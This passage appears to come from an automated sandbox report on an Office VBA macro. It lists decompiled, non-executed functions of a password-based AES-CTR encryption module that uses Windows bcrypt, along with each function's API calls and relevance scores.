20	Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr"(Ptr() as Any) as LongPtr
21	Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong as Long) as Long
22	Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036"(RandomBuffer as Any, ByVal RandomBufferLength as Long) as Long
24	Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm as LongPtr, ByVal pszAlgId as LongPtr, ByVal pszImplementation as LongPtr, ByVal dwFlags as Long) as Long
25	Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm as LongPtr, ByVal dwFlags as Long) as Long
26	Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject as LongPtr, ByVal pszProperty as LongPtr, pbOutput as Any, ByVal cbOutput as Long, cbResult as Long, ByVal dwFlags as Long) as Long
27	Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject as LongPtr, ByVal pszProperty as LongPtr, ByVal pbInput as LongPtr, ByVal cbInput as Long, ByVal dwFlags as Long) as Long
28	Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm as LongPtr, phKey as LongPtr, pbKeyObject as Any, ByVal cbKeyObject as Long, pbSecret as Any, ByVal cbSecret as Long, ByVal dwFlags as Long) as Long
29	Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey as LongPtr) as Long
30	Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey as LongPtr, pbInput as Any, ByVal cbInput as Long, ByVal pPaddingInfo as LongPtr, ByVal pbIV as LongPtr, ByVal cbIV as Long, pbOutput as Any, ByVal cbOutput as Long, pcbResult as Long, ByVal dwFlags as Long) as Long
31	Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf as LongPtr, pbPassword as Any, ByVal cbPassword as Long, pbSalt as Any, ByVal cbSalt as Long, ByVal cIterations as Currency, pbDerivedKey as Any, ByVal cbDerivedKey as Long, ByVal dwFlags as Long) as Long
32	Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm as LongPtr, phHash as LongPtr, ByVal pbHashObject as LongPtr, ByVal cbHashObject as Long, pbSecret as Any, ByVal cbSecret as Long, ByVal dwFlags as Long) as Long
33	Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash as LongPtr) as Long
34	Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash as LongPtr, pbInput as Any, ByVal cbInput as Long, ByVal dwFlags as Long) as Long
35	Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash as LongPtr, pbOutput as Any, ByVal cbOutput as Long, ByVal dwFlags as Long) as Long
36	#else

Non-Executed Functions

Function
pvCryptoAesCtrInitAPIs: 45, Strings: 6, Number of lines: 62, Relevance: 91.062

APIs	Meta Information
vbNullString
vbNullString
AES_IVLEN
UBound
BCryptOpenAlgorithmProvider
StrPtr
KDF_HASH
MS_PRIMITIVE_PROVIDER
BCRYPT_ALG_HANDLE_HMAC_FLAG
BCryptDeriveKeyPBKDF2
pvArrayPtr
pvArraySize
KDF_ITER
UBound
BCryptOpenAlgorithmProvider
StrPtr
MS_PRIMITIVE_PROVIDER
BCryptGetProperty
StrPtr
BCryptSetProperty
StrPtr
BCryptGenerateSymmetricKey
CopyMemory
AES_IVLEN
BCryptOpenAlgorithmProvider
StrPtr
HMAC_HASH
MS_PRIMITIVE_PROVIDER
BCRYPT_ALG_HANDLE_HMAC_FLAG
BCryptGetProperty
StrPtr
BCryptCreateHash
AES_IVLEN
LastError
Part of subcall function GetSystemMessage@Module3: Space$
Part of subcall function GetSystemMessage@Module3: FormatMessage
Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_FROM_SYSTEM
Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_IGNORE_INSERTS
Part of subcall function GetSystemMessage@Module3: Len
Part of subcall function GetSystemMessage@Module3: Mid$
Part of subcall function GetSystemMessage@Module3: vbCrLf
Part of subcall function GetSystemMessage@Module3: Left$
Part of subcall function GetSystemMessage@Module3: Hex
LastError
ERR_UNSUPPORTED_ENCR

Strings	Decrypted Strings
"Microsoft Primitive Provider"
"AES"
"ObjectLength"
"ChainingMode"
"ChainingModeECB"
"HashDigestLength"

Line	Instruction	Meta Information
299	Private Function pvCryptoAesCtrInit(uCtx as UcsCryptoContextType, baPass() as Byte, baSalt() as Byte, baDerivedKey() as Byte, ByVal lKeyLen as Long) as Boolean
300	Const MS_PRIMITIVE_PROVIDER as String = "Microsoft Primitive Provider"
301	Const BCRYPT_ALG_HANDLE_HMAC_FLAG as Long = 8
302	Dim hResult as Long
304	With uCtx
306	. EncrData = vbNullString	vbNullString
307	. EncrPos = 0
308	. LastError = vbNullString	vbNullString
309	Redim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1)	AES_IVLEN
310	If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then	UBound
312	On Error Goto EH_Unsupported
313	hResult = BCryptOpenAlgorithmProvider(. hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)	BCryptOpenAlgorithmProvider StrPtr KDF_HASH MS_PRIMITIVE_PROVIDER BCRYPT_ALG_HANDLE_HMAC_FLAG
314	If hResult < 0 Then
315	Goto QH
316	Endif
317	hResult = BCryptDeriveKeyPBKDF2(. hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt), KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)	BCryptDeriveKeyPBKDF2 pvArrayPtr pvArraySize KDF_ITER UBound
319	If hResult < 0 Then
320	Goto QH
321	Endif
322	On Error Goto 0
323	Endif
325	On Error Goto EH_Unsupported
326	hResult = BCryptOpenAlgorithmProvider(. hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)	BCryptOpenAlgorithmProvider StrPtr MS_PRIMITIVE_PROVIDER
327	If hResult < 0 Then
328	Goto QH
329	Endif
330	On Error Goto 0
331	hResult = BCryptGetProperty(. hAesAlg, StrPtr("ObjectLength"), . AesKeyObjLen, 4, 0, 0)	BCryptGetProperty StrPtr
332	If hResult < 0 Then
333	Goto QH
334	Endif
335	hResult = BCryptSetProperty(. hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)	BCryptSetProperty StrPtr
336	If hResult < 0 Then
337	Goto QH
338	Endif
339	ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte ' BAD !
340	hResult = BCryptGenerateSymmetricKey(. hAesAlg, . hAesKey, . AesKeyObjData(0), . AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)	BCryptGenerateSymmetricKey
341	If hResult < 0 Then
342	Goto QH
343	Endif
345	Call CopyMemory(. Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)	CopyMemory AES_IVLEN
347	hResult = BCryptOpenAlgorithmProvider(. hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)	BCryptOpenAlgorithmProvider StrPtr HMAC_HASH MS_PRIMITIVE_PROVIDER BCRYPT_ALG_HANDLE_HMAC_FLAG
348	If hResult < 0 Then
349	Goto QH
350	Endif
351	hResult = BCryptGetProperty(. hHmacAlg, StrPtr("HashDigestLength"), . HashLen, 4, 0, 0)	BCryptGetProperty StrPtr
352	If hResult < 0 Then
353	Goto QH
354	Endif
355	hResult = BCryptCreateHash(. hHmacAlg, . hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - . HashLen), . HashLen, 0)	BCryptCreateHash AES_IVLEN
356	If hResult < 0 Then
357	Goto QH
358	Endif
359	End With
361	pvCryptoAesCtrInit = True
362	Exit Function
362	QH:
364	uCtx.LastError = GetSystemMessage(hResult)	LastError
365	Exit Function
365	EH_Unsupported:
367	uCtx.LastError = ERR_UNSUPPORTED_ENCR	LastError ERR_UNSUPPORTED_ENCR
368	End Function

Function
AesCryptArrayAPIs: 119, Strings: 0, Number of lines: 70, Relevance: 148.82

APIs	Meta Information
IsArray
IsMissing
vbNullString
IsArray
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: vbNullString
vbNullString
IsMissing
IsArray
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: vbNullString
vbNullString
IsArray
AES_KEYLEN
Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString
Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: UBound
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: KDF_HASH
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptDeriveKeyPBKDF2
Part of subcall function pvCryptoAesCtrInit@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrInit@Module3: pvArraySize
Part of subcall function pvCryptoAesCtrInit@Module3: KDF_ITER
Part of subcall function pvCryptoAesCtrInit@Module3: UBound
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptSetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGenerateSymmetricKey
Part of subcall function pvCryptoAesCtrInit@Module3: CopyMemory
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: HMAC_HASH
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptCreateHash
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: LastError
Part of subcall function pvCryptoAesCtrInit@Module3: LastError
Part of subcall function pvCryptoAesCtrInit@Module3: ERR_UNSUPPORTED_ENCR
LastError
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArraySize
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: UBound
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: CopyMemory
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptEncrypt
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrCrypt@Module3: LastError
LastError
IsArray
Part of subcall function pvCryptoGetFinalHash@Module3: HashLen
Part of subcall function pvCryptoGetFinalHash@Module3: BCryptFinishHash
Part of subcall function pvCryptoGetFinalHash@Module3: hHmacHash
Part of subcall function pvCryptoGetFinalHash@Module3: HashLen
UBound
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
VarPtr
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
VarPtr
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
VarPtr
VT_BYREF
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
CopyMemory
UBound
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Array
Number
Err
Source
Description
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Raise

Line	Instruction	Meta Information
186	Public Function AesCryptArray(baData() as Byte, optional Password as Variant, optional Salt as Variant, optional key as Variant, optional ByVal KeyLen as Long, optional Error as String, optional Hmac as Variant) as Boolean
194	Const VT_BYREF as Long = &H4000
195	Dim uCtx as UcsCryptoContextType
196	Dim vErr as Variant
197	Dim bHashBefore as Boolean
198	Dim bHashAfter as Boolean
199	Dim baPass() as Byte
200	Dim baSalt() as Byte
201	Dim baKey() as Byte
202	Dim baTemp() as Byte
203	Dim lPtr as LongPtr
205	On Error Goto EH
206	If IsArray(Hmac) Then	IsArray
207	bHashBefore = (Hmac(0) <= 0)
208	bHashAfter = (Hmac(0) > 0)
209	Endif
210	If IsMissing(Password) Then	IsMissing
211	baPass = vbNullString	vbNullString
212	Elseif IsArray(Password) Then	IsArray
213	baPass = Password
214	Else
215	baPass = ToUtf8Array(Password & vbNullString)	vbNullString
216	Endif
217	If IsMissing(Salt) Then	IsMissing
218	baSalt = baPass
219	Elseif IsArray(Salt) Then	IsArray
220	baSalt = Salt
221	Else
222	baSalt = ToUtf8Array(Salt & vbNullString)	vbNullString
223	Endif
224	If IsArray(key) Then	IsArray
225	baKey = key
226	Endif
227	If KeyLen <= 0 Then
228	KeyLen = AES_KEYLEN	AES_KEYLEN
229	Endif
230	If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then
231	Error = uCtx.LastError	LastError
232	Goto QH
233	Endif
234	If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore := bHashBefore, HashAfter := bHashAfter) Then
235	Error = uCtx.LastError	LastError
236	Goto QH
237	Endif
238	If IsArray(Hmac) Then	IsArray
239	baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)	UBound
240	#if Win64 then
241	lPtr = PeekPtr(VarPtr(Hmac) + 8)	VarPtr
242	#else
243	lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)	VarPtr
244	#endif
245	If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then	VarPtr VT_BYREF
246	lPtr = PeekPtr(lPtr)
247	Endif
248	#if Win64 then
249	lPtr = PeekPtr(lPtr + 16)
250	#else
251	lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)
252	#endif
253	Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)	CopyMemory UBound
254	Endif
256	AesCryptArray = True
256	QH:
258	pvCryptoAesCtrTerminate uCtx
259	Exit Function
259	EH:
261	vErr = Array(Err.Number, Err.Source, Err.Description)	Array Number Err Source Description
262	pvCryptoAesCtrTerminate uCtx
263	Err.Raise vErr(0), vErr(1), vErr(2)	Raise
264	End Function

Function
AesEncryptStringAPIs: 83, Strings: 0, Number of lines: 32, Relevance: 103.782

APIs	Meta Information
OPENSSL_MAGICLEN
KDF_SALTLEN
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: vbNullString
vbNullString
vbNullString
IsArray
IsMissing
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: vbNullString
vbNullString
KDF_SALTLEN
RtlGenRandom
KDF_SALTLEN
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: IsMissing
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsMissing
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: AES_KEYLEN
Part of subcall function AesCryptArray@Module3: LastError
Part of subcall function AesCryptArray@Module3: LastError
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: UBound
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VT_BYREF
Part of subcall function AesCryptArray@Module3: CopyMemory
Part of subcall function AesCryptArray@Module3: UBound
Part of subcall function AesCryptArray@Module3: Array
Part of subcall function AesCryptArray@Module3: Number
Part of subcall function AesCryptArray@Module3: Err
Part of subcall function AesCryptArray@Module3: Source
Part of subcall function AesCryptArray@Module3: Description
Part of subcall function AesCryptArray@Module3: Raise
Raise
vbObjectError
IsArray
UBound
PREFIXLEN
UBound
PREFIXLEN
CopyMemory
PREFIXLEN
UBound
CopyMemory
OPENSSL_MAGICLEN
KDF_SALTLEN
CopyMemory
OPENSSL_MAGIC
OPENSSL_MAGICLEN
Replace
Part of subcall function ToBase64Array@Module3: UBound
Part of subcall function ToBase64Array@Module3: String$
Part of subcall function ToBase64Array@Module3: UBound
Part of subcall function ToBase64Array@Module3: Len
Part of subcall function ToBase64Array@Module3: CryptBinaryToString
Part of subcall function ToBase64Array@Module3: VarPtr
Part of subcall function ToBase64Array@Module3: UBound
Part of subcall function ToBase64Array@Module3: CRYPT_STRING_BASE64
Part of subcall function ToBase64Array@Module3: StrPtr
Part of subcall function ToBase64Array@Module3: Left$
vbCrLf
vbNullString

Line	Instruction	Meta Information
112	Public Function AesEncryptString(sText as String, optional Password as Variant) as String
113	Const PREFIXLEN as Long = OPENSSL_MAGICLEN + KDF_SALTLEN	OPENSSL_MAGICLEN KDF_SALTLEN
114	Dim baData() as Byte
115	Dim baPass() as Byte
116	Dim baSalt() as Byte
117	Dim baKey() as Byte
118	Dim sError as String
120	baData = ToUtf8Array(sText)
121	baPass = vbNullString	vbNullString
122	baSalt = vbNullString	vbNullString
123	If Not IsArray(Password) Then	IsArray
124	If Not IsMissing(Password) Then	IsMissing
125	baPass = ToUtf8Array(Password & vbNullString)	vbNullString
126	Endif
127	Redim baSalt(0 To KDF_SALTLEN - 1)	KDF_SALTLEN
128	Call RtlGenRandom(baSalt(0), KDF_SALTLEN)	RtlGenRandom KDF_SALTLEN
129	Else
130	baKey = Password
131	Endif
132	If Not AesCryptArray(baData, baPass, baSalt, baKey, Error := sError) Then
133	Err.Raise vbObjectError, , sError	Raise vbObjectError
134	Endif
135	If Not IsArray(Password) Then	IsArray
136	Redim Preserve baData(0 To UBound(baData) + PREFIXLEN)	UBound PREFIXLEN
137	If UBound(baData) >= PREFIXLEN Then	UBound PREFIXLEN
138	Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)	CopyMemory PREFIXLEN UBound
139	Endif
140	Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)	CopyMemory OPENSSL_MAGICLEN KDF_SALTLEN
141	Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)	CopyMemory OPENSSL_MAGIC OPENSSL_MAGICLEN
142	Endif
143	AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)	Replace vbCrLf vbNullString
144	End Function

Function
AesDecryptStringAPIs: 79, Strings: 0, Number of lines: 37, Relevance: 98.787

APIs	Meta Information
OPENSSL_MAGICLEN
KDF_SALTLEN
Part of subcall function FromBase64Array@Module3: Len
Part of subcall function FromBase64Array@Module3: CryptStringToBinary
Part of subcall function FromBase64Array@Module3: StrPtr
Part of subcall function FromBase64Array@Module3: Len
Part of subcall function FromBase64Array@Module3: CRYPT_STRING_BASE64
Part of subcall function FromBase64Array@Module3: VarPtr
Part of subcall function FromBase64Array@Module3: vbNullString
vbNullString
vbNullString
IsArray
IsMissing
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: vbNullString
vbNullString
UBound
PREFIXLEN
String$
OPENSSL_MAGICLEN
CopyMemory
OPENSSL_MAGICLEN
OPENSSL_MAGIC
KDF_SALTLEN
CopyMemory
OPENSSL_MAGICLEN
KDF_SALTLEN
UBound
PREFIXLEN
CopyMemory
PREFIXLEN
UBound
UBound
PREFIXLEN
vbNullString
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: IsMissing
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsMissing
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: AES_KEYLEN
Part of subcall function AesCryptArray@Module3: LastError
Part of subcall function AesCryptArray@Module3: LastError
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: UBound
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VT_BYREF
Part of subcall function AesCryptArray@Module3: CopyMemory
Part of subcall function AesCryptArray@Module3: UBound
Part of subcall function AesCryptArray@Module3: Array
Part of subcall function AesCryptArray@Module3: Number
Part of subcall function AesCryptArray@Module3: Err
Part of subcall function AesCryptArray@Module3: Source
Part of subcall function AesCryptArray@Module3: Description
Part of subcall function AesCryptArray@Module3: Raise
Raise
vbObjectError
Part of subcall function FromUtf8Array@Module3: UBound
Part of subcall function FromUtf8Array@Module3: String$
Part of subcall function FromUtf8Array@Module3: UBound
Part of subcall function FromUtf8Array@Module3: MultiByteToWideChar
Part of subcall function FromUtf8Array@Module3: CP_UTF8
Part of subcall function FromUtf8Array@Module3: UBound
Part of subcall function FromUtf8Array@Module3: StrPtr
Part of subcall function FromUtf8Array@Module3: Len
Part of subcall function FromUtf8Array@Module3: Left$

Line	Instruction	Meta Information
147	Public Function AesDecryptString(sEncr as String, optional Password as Variant) as String
148	Const PREFIXLEN as Long = OPENSSL_MAGICLEN + KDF_SALTLEN	OPENSSL_MAGICLEN KDF_SALTLEN
149	Dim baData() as Byte
150	Dim baPass() as Byte
151	Dim baSalt() as Byte
152	Dim baKey() as Byte
153	Dim sMagic as String
154	Dim sError as String
156	baData = FromBase64Array(sEncr)
157	baPass = vbNullString	vbNullString
158	baSalt = vbNullString	vbNullString
159	If Not IsArray(Password) Then	IsArray
160	If Not IsMissing(Password) Then	IsMissing
161	baPass = ToUtf8Array(Password & vbNullString)	vbNullString
162	Endif
163	If UBound(baData) >= PREFIXLEN - 1 Then	UBound PREFIXLEN
164	sMagic = String$(OPENSSL_MAGICLEN, 0)	String$ OPENSSL_MAGICLEN
165	Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)	CopyMemory OPENSSL_MAGICLEN
166	If sMagic = OPENSSL_MAGIC Then	OPENSSL_MAGIC
167	Redim baSalt(0 To KDF_SALTLEN - 1)	KDF_SALTLEN
168	Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)	CopyMemory OPENSSL_MAGICLEN KDF_SALTLEN
169	If UBound(baData) >= PREFIXLEN Then	UBound PREFIXLEN
170	Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)	CopyMemory PREFIXLEN UBound
171	Redim Preserve baData(0 To UBound(baData) - PREFIXLEN)	UBound PREFIXLEN
172	Else
173	baData = vbNullString	vbNullString
174	Endif
175	Endif
176	Endif
177	Else
178	baKey = Password
179	Endif
180	If Not AesCryptArray(baData, baPass, baSalt, baKey, Error := sError) Then
181	Err.Raise vbObjectError, , sError	Raise vbObjectError
182	Endif
183	AesDecryptString = FromUtf8Array(baData)
184	End Function

Function
AesChunkedInitAPIs: 46, Strings: 0, Number of lines: 13, Relevance: 57.513

APIs	Meta Information
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
m_uChunkedCtx
vbNullString
IsArray
AES_KEYLEN
Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString
Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: UBound
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: KDF_HASH
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptDeriveKeyPBKDF2
Part of subcall function pvCryptoAesCtrInit@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrInit@Module3: pvArraySize
Part of subcall function pvCryptoAesCtrInit@Module3: KDF_ITER
Part of subcall function pvCryptoAesCtrInit@Module3: UBound
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptSetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGenerateSymmetricKey
